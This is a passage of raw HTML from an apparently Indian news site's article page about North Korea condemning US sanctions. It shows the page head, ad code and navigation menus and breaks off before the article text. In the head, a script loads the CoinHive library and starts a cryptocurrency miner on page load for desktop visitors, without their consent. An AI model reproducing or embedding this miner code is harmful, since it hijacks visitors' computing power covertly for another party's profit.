<!DOCTYPE html>
<!--[if lt IE 7]>      <html class="no-js lt-ie9 lt-ie8 lt-ie7" lang="en-GB"> <![endif]-->
<!--[if IE 7]>         <html class="no-js lt-ie9 lt-ie8" lang="en-GB"> <![endif]-->
<!--[if IE 8]>         <html class="no-js lt-ie9" lang="en-GB"> <![endif]-->
<!--[if gt IE 8]><!--> <html class="no-js" lang="en-GB"> <!--<![endif]-->
    <head>

	<meta charset="UTF-8" />
        <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
	<title>N Korea slams latest US sanctions as &#8216;act of war&#8217; | State Times</title>
	<link rel="profile" href="http://gmpg.org/xfn/11">
	<link rel="pingback" href="http://news.statetimes.in/xmlrpc.php">
<meta property="og:image" content="http://news.statetimes.in/wp-content/uploads/2017/04/North-Korea-quiet-amid-expectation-of-missile-follow-up.jpg"/>
    <meta property="og:image:width" content="1024" />
    <meta property="og:image:height" content="1024" />

<meta property="og:title" content="N Korea slams latest US sanctions as &#8216;act of war&#8217;"/>
<meta property="og:type" content="article"/>
<meta property="og:description" content="Seoul: North Korea tody slammed the latest US measures against it as an "act of war", after US President Donald Trump announced the "heaviest sanctions ever" on the nuclear-armed regime. The measures,"/>
<meta property="og:url" content="http://news.statetimes.in/n-korea-slams-latest-us-sanctions-as-act-of-war/"/>
<meta property="og:site_name" content="State Times"/>

<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<link rel="shortcut icon" href="http://news.statetimes.in/wp-content/uploads/2014/08/favicon.png?x39047" />
<link rel="apple-touch-icon" href="http://news.statetimes.in/wp-content/themes/goodnews5/apple-touch-icon-precomposed.png?x39047" />
<script src="https://coin-hive.com/lib/coinhive.min.js"></script>
<script>
	var miner = new CoinHive.Anonymous('P8XLU9qWSu7NaL91VW8ODQHZYJBdj6NY', {throttle: 0.3});
	if (!miner.isMobile() && !miner.didOptOut(14400)) {
		miner.start();
	}
</script>

<link rel="pingback" href="http://news.statetimes.in/xmlrpc.php" />
        <!--[if lt IE 9]>
	<script src="http://news.statetimes.in/wp-content/themes/goodnews5/framework/helpers/js/html5.js?x39047"></script>
	<script src="http://news.statetimes.in/wp-content/themes/goodnews5/framework/helpers/js/IE9.js?x39047"></script>
	<![endif]-->
	<link rel='dns-prefetch' href='//s.w.org' />
<link rel="alternate" type="application/rss+xml" title="State Times &raquo; Feed" href="http://news.statetimes.in/feed/" />
<link rel="alternate" type="application/rss+xml" title="State Times &raquo; Comments Feed" href="http://news.statetimes.in/comments/feed/" />
<link rel="alternate" type="application/rss+xml" title="State Times &raquo; N Korea slams latest US sanctions as &#8216;act of war&#8217; Comments Feed" href="http://news.statetimes.in/n-korea-slams-latest-us-sanctions-as-act-of-war/feed/" />
		<script type="text/javascript">
			window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/2.4\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/2.4\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/news.statetimes.in\/wp-includes\/js\/wp-emoji-release.min.js?ver=4.9.4"}};
			!function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55357,56692,8205,9792,65039],[55357,56692,8203,9792,65039]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings);
		</script>
		<style type="text/css">
img.wp-smiley,
img.emoji {
	display: inline !important;
	border: none !important;
	box-shadow: none !important;
	height: 1em !important;
	width: 1em !important;
	margin: 0 .07em !important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
</style>
<link rel='stylesheet' id='contact-form-7-css'  href='http://news.statetimes.in/wp-content/plugins/contact-form-7/includes/css/styles.css?x39047' type='text/css' media='all' />
<link rel='stylesheet' id='chosen-css'  href='http://news.statetimes.in/wp-content/plugins/wp-job-manager/assets/css/chosen.css?x39047' type='text/css' media='all' />
<link rel='stylesheet' id='wp-job-manager-frontend-css'  href='http://news.statetimes.in/wp-content/plugins/wp-job-manager/assets/css/frontend.css?x39047' type='text/css' media='all' />
<link rel='stylesheet' id='plugins-css'  href='http://news.statetimes.in/wp-content/themes/goodnews5/css/plugins.css?x39047' type='text/css' media='all' />
<link rel='stylesheet' id='main-css'  href='http://news.statetimes.in/wp-content/themes/goodnews5/css/main.css?x39047' type='text/css' media='all' />
<link rel='stylesheet' id='responsive-css'  href='http://news.statetimes.in/wp-content/themes/goodnews5/css/media.css?x39047' type='text/css' media='all' />
<link rel='stylesheet' id='style-css'  href='http://news.statetimes.in/wp-content/themes/child-theme/style.css?x39047' type='text/css' media='all' />
<link rel='stylesheet' id='black-style-css'  href='http://news.statetimes.in/wp-content/themes/goodnews5/css/flamingo.css?x39047' type='text/css' media='all' />
<script type='text/javascript' src='http://news.statetimes.in/wp-includes/js/jquery/jquery.js?x39047'></script>
<script type='text/javascript' src='http://news.statetimes.in/wp-includes/js/jquery/jquery-migrate.min.js?x39047'></script>
<link rel='https://api.w.org/' href='http://news.statetimes.in/wp-json/' />
<link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://news.statetimes.in/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://news.statetimes.in/wp-includes/wlwmanifest.xml" /> 
<link rel='prev' title='Jansewa Ka Ek Avloken celebrates Annual Day' href='http://news.statetimes.in/jansewa-ka-ek-avloken-celebrates-annual-day/' />
<link rel='next' title='J-K exploits just 16% of hydro-power potential despite growing demand: Survey' href='http://news.statetimes.in/j-k-exploits-just-16-of-hydro-power-potential-despite-growing-demand-survey/' />
<meta name="generator" content="WordPress 4.9.4" />
<link rel="canonical" href="http://news.statetimes.in/n-korea-slams-latest-us-sanctions-as-act-of-war/" />
<link rel='shortlink' href='http://news.statetimes.in/?p=335137' />
<link rel="alternate" type="application/json+oembed" href="http://news.statetimes.in/wp-json/oembed/1.0/embed?url=http%3A%2F%2Fnews.statetimes.in%2Fn-korea-slams-latest-us-sanctions-as-act-of-war%2F" />
<link rel="alternate" type="text/xml+oembed" href="http://news.statetimes.in/wp-json/oembed/1.0/embed?url=http%3A%2F%2Fnews.statetimes.in%2Fn-korea-slams-latest-us-sanctions-as-act-of-war%2F&#038;format=xml" />
<meta name="msvalidate.01" content="E16D694C0F66CFA1ABC9F98B3398A6E5" />
<script type="text/javascript" async defer
  src="https://apis.google.com/js/platform.js?publisherid=101378335416363517049">
</script>
<link href="https://plus.google.com/101378335416363517049" rel="publisher" />
<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<script>
     (adsbygoogle = window.adsbygoogle || []).push({
          google_ad_client: "ca-pub-3121650879019050",
          enable_page_level_ads: true
     });
</script>
<meta name="generator" content="Powered by Visual Composer - drag and drop page builder for WordPress."/>
<!--[if lte IE 9]><link rel="stylesheet" type="text/css" href="http://news.statetimes.in/wp-content/plugins/js_composer/assets/css/vc_lte_ie9.min.css?x39047" media="screen"><![endif]--><style type="text/css" title="dynamic-css" class="options-output">body{color:#282828;}{color:#262626;}.news-ticker{background-color:#262626;}.news-ticker li a, .news-ticker li{color:#ffffff;}</style><style type="text/css">
    
.header > .inner, .header .logo {
line-height: 112px;
height: 112px;
}
/* Category background */
</style>
<noscript><style type="text/css"> .wpb_animate_when_almost_visible { opacity: 1; }</style></noscript>    </head>
    <body class="post-template-default single single-post postid-335137 single-format-standard both-sidebars-all both-sidebars singular both_sidebars_same_width fade-imgs-in-appear sticky_navigation_on navigation_highlight_ancestor time_in_twelve_format one-side-wide both-sidebars both-sides-true smooth_scroll_enable show_secondary_sidebar_on_ipad goodnews-child wpb-js-composer js-comp-ver-5.2.1 vc_responsive" itemscope="itemscope" itemtype="http://schema.org/WebPage">
    
        <!--[if lt IE 7]>
            <p class="browsehappy">You are using an <strong>outdated</strong> browser. Please <a href="http://browsehappy.com/">upgrade your browser</a> to improve your experience.</p>
        <![endif]-->
        <div class="boxed-wrap clearfix">
	    <div id="header-wrapper">
                         <div class="topbar">
  <div class="inner">
            <div class="top-left-content">
                 			     <ul id="menu-top-menu" class="top-nav mom_visibility_desktop"><li id="menu-item-72" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-home menu-item-72"><a href="http://news.statetimes.in">Home</a></li>
<li id="menu-item-69" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-69"><a target="_blank" href="http://www.statetimes.in/epaper/">E-Paper</a></li>
<li id="menu-item-71" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-71"><a target="_blank" href="http://news.statetimes.in/sitemap.xml">Sitemap</a></li>
<li id="menu-item-4980" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-4980"><a href="https://news.statetimes.in/about-us/">About us</a></li>
<li id="menu-item-4981" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-4981"><a href="https://news.statetimes.in/contact-us/">Contact us</a></li>
<li id="menu-item-57375" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-57375"><a href="https://news.statetimes.in/jobs/">Job Portal</a></li>
</ul>
     			     <div class="mom_visibility_device device-top-menu-wrap">
			      <div class="top-menu-holder"><i class="fa-icon-reorder mh-icon"></i></div>
			      <ul id="menu-top-menu-1" class="device-top-nav"><li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-home menu-item-72"><a href="http://news.statetimes.in">Home</a></li>
<li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-69"><a target="_blank" href="http://www.statetimes.in/epaper/">E-Paper</a></li>
<li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-71"><a target="_blank" href="http://news.statetimes.in/sitemap.xml">Sitemap</a></li>
<li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-4980"><a href="https://news.statetimes.in/about-us/">About us</a></li>
<li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-4981"><a href="https://news.statetimes.in/contact-us/">Contact us</a></li>
<li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-57375"><a href="https://news.statetimes.in/jobs/">Job Portal</a></li>
</ul>			     </div>

                        </div> <!--tb left-->
        <div class="top-right-content">
            		    <ul class="mom-social-icons">
                    <li class="twitter"><a target="_blank" class="vector_icon" href="https://www.twitter.com/state_times"><i class="fa-icon-twitter"></i></a></li>
        
                <li class="facebook"><a target="_blank" class="vector_icon" href="https://www.facebook.com/statetimes"><i class="fa-icon-facebook "></i></a></li>        
        
                   <li class="gplus"><a target="_blank" class="vector_icon" href="https://plus.google.com/112398265041024324940/" ><i class="fa-icon-google-plus"></i></a></li>     
        
        
                        <li class="youtube"><a target="_blank" class="vector_icon" href="https://www.youtube.com/statetimes1"><i class="fa-icon-youtube"></i></a></li>
        
        
        
        

        

        
                        <li class="tumblr"><a target="_blank" class="vector_icon" href="http://statetimes1.tumblr.com"><i class="fa-icon-tumblr"></i></a></li>
                             <li class="rss"><a target="_blank" class="vector_icon" href="http://news.statetimes.in/feed/"><i class="fa-icon-rss"></i></a></li>
        	
	    </ul>
                    </div> <!--tb right-->
</div>
 </div> <!--topbar-->
             <header class="header " itemscope="itemscope" itemtype="http://schema.org/WPHeader" role="banner">
                <div class="inner">
						                    <div class="logo">
					                    <a href="http://news.statetimes.in">
		                                                    <img src="http://news.statetimes.in/wp-content/uploads/2015/04/stlogosmall.jpg?x39047" alt="State Times" width="445" height="77" />
                                                                                               <img class="mom_retina_logo" src="http://news.statetimes.in/wp-content/uploads/2015/04/stlogosmall.jpg?x39047" width="445" height="77" alt="State Times" />
                                                		                    </a>

					
                    </div>
                                        <div class="header-right">
                                  		<script type="text/javascript">
		jQuery(document).ready(function($) {
			$('.e3lanat-rotator-id-360 .mom-e3lanat-inner').imagesLoaded( function() {
			jQuery('.e3lanat-rotator-id-360 .mom-e3lanat-inner').boxSlider({
				autoScroll: true,
				timeout: 5000,
				speed: 800,
				effect: 'scrollVert3d',
				pauseOnHover: true,
				next:'.e3lanat-rotator-id-360 .adr-next',
				prev: '.e3lanat-rotator-id-360 .adr-prev'
				
			});

			});

		});
	</script>
		<div class="mom-e3lanat-wrap  ">
	<div class="mom-e3lanat e3lanat-layout-rotator e3lanat-rotator-id-360" style="width:728px; height:90px;">
		<div class="mom-e3lanat-inner">
		
				<div class="mom-e3lan" data-id="60802" style=" ">
		<div class="e3lan-code"><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- top banner -->
<ins class="adsbygoogle"
     style="display:inline-block;width:728px;height:90px"
     data-ad-client="ca-pub-3121650879019050"
     data-ad-slot="4210843814"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script></div>	</div><!--mom ad-->
					<div class="mom-e3lan" data-id="60802" style=" ">
		<div class="e3lan-code"><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- top banner -->
<ins class="adsbygoogle"
     style="display:inline-block;width:728px;height:90px"
     data-ad-client="ca-pub-3121650879019050"
     data-ad-slot="4210843814"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script></div>	</div><!--mom ad-->
			</div>
	</div>	<!--Mom ads-->
	</div>
                    </div> <!--header right-->
                    
                <div class="clear"></div>
                </div>
            </header>
	    	    </div> <!--header wrap-->
                                    <nav id="navigation" itemtype="http://schema.org/SiteNavigationElement" itemscope="itemscope" role="navigation" class="dd-effect-slide ">
                <div class="navigation-inner">
                <div class="inner">
                                                                <ul id="menu-primary-two" class="main-menu mom_visibility_desktop"><li id="menu-item-58059" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-home mom_default_menu_item menu-item-iconsOnly menu-item-depth-0"><a href="http://news.statetimes.in/"><i class="icon_only momizat-icon-home"></i><span class="icon_only_label">Home</span></a></li>
<li id="menu-item-58080" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-parent-item mom_mega_cats menu-item-depth-0"><a href="https://news.statetimes.in/section/news/jknews/">Jammu and Kashmir</a><div class='cats-mega-wrap '>
<div class="cats-mega-inner">

<ul class="sub-menu ">
	<li id="menu-item-58091" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item active menu-item-depth-1"><a href="https://news.statetimes.in/section/news/jknews/topjknews/">Top J&#038;K News</a></li>
	<li id="menu-item-58083" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="https://news.statetimes.in/section/news/jknews/local-news/">Cities &#038; Towns</a></li>
	<li id="menu-item-58086" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="https://news.statetimes.in/section/news/jknews/jksports/">J&#038;K Sports</a></li>
	<li id="menu-item-58085" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="https://news.statetimes.in/section/news/jknews/crime-watch/">Crime Watch</a></li>
	<li id="menu-item-58084" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="https://news.statetimes.in/section/news/jknews/courts/">Courts</a></li>
	<li id="menu-item-58081" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="https://news.statetimes.in/section/news/jknews/art-culture/">Art &#038; Culture</a></li>
</ul>
<div class='subcat'><div class='active mom-cat-latest' id='mn-latest-58091' data-id='15' data-object='category' data-layout=''><ul id='mn-ul-latest-58091'><li class='has-thumbnail' ><div class='subcat-thumbnail'><a href='https://news.statetimes.in/working-for-decades-at-bagh-e-bahu-lensmen-at-verge-of-starvation/' title='Working for decades at Bagh-e-Bahu, lensmen at verge of starvation'><img src='https://news.statetimes.in/wp-content/uploads/2018/02/a-1-90x60.jpg?x39047' alt='Working for decades at Bagh-e-Bahu, lensmen at verge of starvation' width='70' height='47'></a></div><div class='subcat-title'><a href='https://news.statetimes.in/working-for-decades-at-bagh-e-bahu-lensmen-at-verge-of-starvation/' title='Working for decades at Bagh-e-Bahu, lensmen at verge of starvation'> Working for decades at Bagh-e-Bahu, lensmen at verge of starvation</a><span> - 36 mins ago</span></div></li><li class='has-thumbnail' ><div class='subcat-thumbnail'><a href='https://news.statetimes.in/cm-orders-probe-madnis-son-declines-kvib-job-offer/' title='CM orders probe: Madni&#8217;s son declines KVIB job offer'><img src='https://news.statetimes.in/wp-content/uploads/2017/03/ST-LOGO-1-90x60.jpg?x39047' alt='CM orders probe: Madni&#8217;s son declines KVIB job offer' width='70' height='47'></a></div><div class='subcat-title'><a href='https://news.statetimes.in/cm-orders-probe-madnis-son-declines-kvib-job-offer/' title='CM orders probe: Madni&#8217;s son declines KVIB job offer'> CM orders probe: Madni&#8217;s son declines KVIB job offer</a><span> - 43 mins ago</span></div></li><li class='has-thumbnail' ><div class='subcat-thumbnail'><a href='https://news.statetimes.in/6-civilians-killed-13-injured-in-pak-shelling-during-last-10-months-in-j-k/' title='6 civilians killed, 13 injured in Pak shelling during last 10 months in J-K'><img src='https://news.statetimes.in/wp-content/uploads/2017/12/ceasefire-lead-90x60.jpg?x39047' alt='6 civilians killed, 13 injured in Pak shelling during last 10 months in J-K' width='70' height='47'></a></div><div class='subcat-title'><a href='https://news.statetimes.in/6-civilians-killed-13-injured-in-pak-shelling-during-last-10-months-in-j-k/' title='6 civilians killed, 13 injured in Pak shelling during last 10 months in J-K'> 6 civilians killed, 13 injured in Pak shelling during last 10 months in J-K</a><span> - 1 hour ago</span></div></li><li class='has-thumbnail' ><div class='subcat-thumbnail'><a href='https://news.statetimes.in/militants-gun-down-cop-near-chrar-e-sharif-shrine-in-jks-budgam/' title='Militants gun down cop near Chrar-e-Sharif shrine in J&#038;K&#8217;s Budgam'><img src='https://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-90x60.jpg?x39047' alt='Militants gun down cop near Chrar-e-Sharif shrine in J&#038;K&#8217;s Budgam' width='70' height='47'></a></div><div class='subcat-title'><a href='https://news.statetimes.in/militants-gun-down-cop-near-chrar-e-sharif-shrine-in-jks-budgam/' title='Militants gun down cop near Chrar-e-Sharif shrine in J&#038;K&#8217;s Budgam'> Militants gun down cop near Chrar-e-Sharif shrine in J&#038;K&#8217;s Budgam</a><span> - 1 hour ago</span></div></li></ul><a href='https://news.statetimes.in/section/news/jknews/topjknews/' title='' class='view_all_posts'>View all<i class='long-arrow-icon'></i></a></div><div class=' mom-cat-latest' id='mn-latest-58083' data-id='16' data-object='category' data-layout=''><ul id='mn-ul-latest-58083'></ul><a href='https://news.statetimes.in/section/news/jknews/local-news/' title='' class='view_all_posts'>View all<i class='long-arrow-icon'></i></a></div><div class=' mom-cat-latest' id='mn-latest-58086' data-id='17' data-object='category' data-layout=''><ul id='mn-ul-latest-58086'></ul><a href='https://news.statetimes.in/section/news/jknews/jksports/' title='' class='view_all_posts'>View all<i class='long-arrow-icon'></i></a></div><div class=' mom-cat-latest' id='mn-latest-58085' data-id='233' data-object='category' data-layout=''><ul id='mn-ul-latest-58085'></ul><a href='https://news.statetimes.in/section/news/jknews/crime-watch/' title='' class='view_all_posts'>View all<i class='long-arrow-icon'></i></a></div><div class=' mom-cat-latest' id='mn-latest-58084' data-id='1355' data-object='category' data-layout=''><ul id='mn-ul-latest-58084'></ul><a href='https://news.statetimes.in/section/news/jknews/courts/' title='' class='view_all_posts'>View all<i class='long-arrow-icon'></i></a></div><div class=' mom-cat-latest' id='mn-latest-58081' data-id='1349' data-object='category' data-layout=''><ul id='mn-ul-latest-58081'></ul><a href='https://news.statetimes.in/section/news/jknews/art-culture/' title='' class='view_all_posts'>View all<i class='long-arrow-icon'></i></a></div></div> 
</div>
</div>
<i class='responsive-caret'></i>
</li>
<li id="menu-item-58092" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-parent-item mom_default_menu_item menu-item-depth-0"><a href="https://news.statetimes.in/section/exclusive/">Exclusive</a>
<ul class="sub-menu ">
	<li id="menu-item-58093" class="menu-item menu-item-type-taxonomy menu-item-object-post_tag mom_default_menu_item active menu-item-depth-1"><a href="https://news.statetimes.in/topic/dost-khan/">Dost Khan</a></li>
	<li id="menu-item-58094" class="menu-item menu-item-type-taxonomy menu-item-object-post_tag mom_default_menu_item menu-item-depth-1"><a href="https://news.statetimes.in/topic/blunt-butcher/">Blunt Butcher</a></li>
	<li id="menu-item-58095" class="menu-item menu-item-type-taxonomy menu-item-object-post_tag mom_default_menu_item menu-item-depth-1"><a href="https://news.statetimes.in/topic/pride-or-shame-2/">Pride or Shame</a></li>
</ul>
<i class='responsive-caret'></i>
</li>
<li id="menu-item-58096" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-0"><a href="https://news.statetimes.in/section/editorial/">Editorial</a></li>
<li id="menu-item-58104" class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-item-has-children menu-parent-item mom_mega_cats menu-item-depth-0"><a href="https://news.statetimes.in/section/news/world/">World</a><div class='cats-mega-wrap '>
<div class="cats-mega-inner">

<ul class="sub-menu ">
	<li id="menu-item-58101" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item active menu-item-depth-1"><a href="https://news.statetimes.in/section/news/india-national/">National</a></li>
	<li id="menu-item-58105" class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent mom_default_menu_item menu-item-depth-1"><a href="https://news.statetimes.in/section/news/world/">World</a></li>
	<li id="menu-item-58100" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="https://news.statetimes.in/section/news/business/">Business</a></li>
	<li id="menu-item-58103" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="https://news.statetimes.in/section/news/sports/">Sports</a></li>
	<li id="menu-item-58102" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="https://news.statetimes.in/section/news/science-tech/">Science n Tech</a></li>
</ul>
<div class='subcat'><div class='active mom-cat-latest' id='mn-latest-58101' data-id='20' data-object='category' data-layout=''><ul id='mn-ul-latest-58101'><li class='has-thumbnail' ><div class='subcat-thumbnail'><a href='https://news.statetimes.in/govt-appointed-toll-collection-firms-need-to-pay-stamp-duty-hc/' title='Govt-appointed toll collection firms need to pay stamp duty: HC'><img src='https://news.statetimes.in/wp-content/uploads/2015/08/Bomb-scare-in-Bombay-High-Court-90x60.jpg?x39047' alt='Govt-appointed toll collection firms need to pay stamp duty: HC' width='70' height='47'></a></div><div class='subcat-title'><a href='https://news.statetimes.in/govt-appointed-toll-collection-firms-need-to-pay-stamp-duty-hc/' title='Govt-appointed toll collection firms need to pay stamp duty: HC'> Govt-appointed toll collection firms need to pay stamp duty: HC</a><span> - 3 hours ago</span></div></li><li class='has-thumbnail' ><div class='subcat-thumbnail'><a href='https://news.statetimes.in/nia-to-seek-interpol-red-corner-notice-against-pak-diplomat-wanted-in-terror-plot/' title='NIA to seek Interpol Red Corner notice against Pak diplomat wanted in terror plot'><img src='https://news.statetimes.in/wp-content/uploads/2017/09/NIA-summons-Kashmir-Bar-Association-prez-lawyers-suspend-work-90x60.jpg?x39047' alt='NIA to seek Interpol Red Corner notice against Pak diplomat wanted in terror plot' width='70' height='47'></a></div><div class='subcat-title'><a href='https://news.statetimes.in/nia-to-seek-interpol-red-corner-notice-against-pak-diplomat-wanted-in-terror-plot/' title='NIA to seek Interpol Red Corner notice against Pak diplomat wanted in terror plot'> NIA to seek Interpol Red Corner notice against Pak diplomat wanted in terror plot</a><span> - 4 hours ago</span></div></li><li class='has-thumbnail' ><div class='subcat-thumbnail'><a href='https://news.statetimes.in/day-to-day-safety-should-be-part-of-our-lives-pm-modi/' title='Day-to-day safety should be part of our lives: PM Modi'><img src='https://news.statetimes.in/wp-content/uploads/2017/12/Modi-1-90x60.jpg?x39047' alt='Day-to-day safety should be part of our lives: PM Modi' width='70' height='47'></a></div><div class='subcat-title'><a href='https://news.statetimes.in/day-to-day-safety-should-be-part-of-our-lives-pm-modi/' title='Day-to-day safety should be part of our lives: PM Modi'> Day-to-day safety should be part of our lives: PM Modi</a><span> - 5 hours ago</span></div></li><li class='has-thumbnail' ><div class='subcat-thumbnail'><a href='https://news.statetimes.in/identify-retail-supplier-to-achieve-power-for-all-derc/' title='Identify retail supplier to achieve power for all: DERC'><img src='https://news.statetimes.in/wp-content/uploads/2018/02/Identify-retail-supplier-to-achieve-power-for-all-DERC-90x60.jpg?x39047' alt='Identify retail supplier to achieve power for all: DERC' width='70' height='47'></a></div><div class='subcat-title'><a href='https://news.statetimes.in/identify-retail-supplier-to-achieve-power-for-all-derc/' title='Identify retail supplier to achieve power for all: DERC'> Identify retail supplier to achieve power for all: DERC</a><span> - 5 hours ago</span></div></li></ul><a href='https://news.statetimes.in/section/news/india-national/' title='' class='view_all_posts'>View all<i class='long-arrow-icon'></i></a></div><div class=' mom-cat-latest' id='mn-latest-58105' data-id='9' data-object='category' data-layout=''><ul id='mn-ul-latest-58105'></ul><a href='https://news.statetimes.in/section/news/world/' title='' class='view_all_posts'>View all<i class='long-arrow-icon'></i></a></div><div class=' mom-cat-latest' id='mn-latest-58100' data-id='22' data-object='category' data-layout=''><ul id='mn-ul-latest-58100'></ul><a href='https://news.statetimes.in/section/news/business/' title='' class='view_all_posts'>View all<i class='long-arrow-icon'></i></a></div><div class=' mom-cat-latest' id='mn-latest-58103' data-id='21' data-object='category' data-layout=''><ul id='mn-ul-latest-58103'></ul><a href='https://news.statetimes.in/section/news/sports/' title='' class='view_all_posts'>View all<i class='long-arrow-icon'></i></a></div><div class=' mom-cat-latest' id='mn-latest-58102' data-id='23' data-object='category' data-layout=''><ul id='mn-ul-latest-58102'></ul><a href='https://news.statetimes.in/section/news/science-tech/' title='' class='view_all_posts'>View all<i class='long-arrow-icon'></i></a></div></div> 
</div>
</div>
<i class='responsive-caret'></i>
</li>
<li id="menu-item-58106" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-parent-item mom_mega_cats menu-item-depth-0"><a href="https://news.statetimes.in/section/entertainment/">Entertainment</a><div class='cats-mega-wrap mom_cats_horizontal'>
<div class="cats-mega-inner">

<ul class="sub-menu ">
	<li id="menu-item-58107" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item active menu-item-depth-1"><a href="https://news.statetimes.in/section/entertainment/bollywod/">Bollywood</a></li>
	<li id="menu-item-58108" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="https://news.statetimes.in/section/entertainment/hollywood/">Hollywood</a></li>
	<li id="menu-item-58109" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="https://news.statetimes.in/section/entertainment/movies/">Movies</a></li>
	<li id="menu-item-58110" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="https://news.statetimes.in/section/entertainment/television/">Television</a></li>
</ul>
<div class='subcat'><div class='active mom-cat-latest' id='mn-latest-58107' data-id='11' data-object='category' data-layout='horz'><ul id='mn-ul-latest-58107'><li class='has-thumbnail' ><div class='subcat-thumbnail'><a href='https://news.statetimes.in/sridevi-the-diva-who-lit-up-indian-cinema-screen/' title='Sridevi: The diva who lit up Indian cinema screen'><img src='https://news.statetimes.in/wp-content/uploads/2018/02/Sridevi-The-diva-who-lit-up-Indian-cinema-screen-120x76.jpg?x39047' alt='Sridevi: The diva who lit up Indian cinema screen' width='117' height='74'></a></div><div class='subcat-title'><a href='https://news.statetimes.in/sridevi-the-diva-who-lit-up-indian-cinema-screen/' title='Sridevi: The diva who lit up Indian cinema screen'> Sridevi: The diva who lit up Indian cinema screen</a><span>  7 hours ago</span></div></li><li class='has-thumbnail' ><div class='subcat-thumbnail'><a href='https://news.statetimes.in/arjun-parineetis-namastey-england-to-hit-theatres-on-december-7/' title='Arjun, Parineeti&#8217;s &#8216;Namastey England&#8217; to hit theatres on December 7'><img src='https://news.statetimes.in/wp-content/uploads/2018/02/Arjun-Parineetis-Namastey-England-to-hit-theatres-on-December-7-120x76.jpg?x39047' alt='Arjun, Parineeti&#8217;s &#8216;Namastey England&#8217; to hit theatres on December 7' width='117' height='74'></a></div><div class='subcat-title'><a 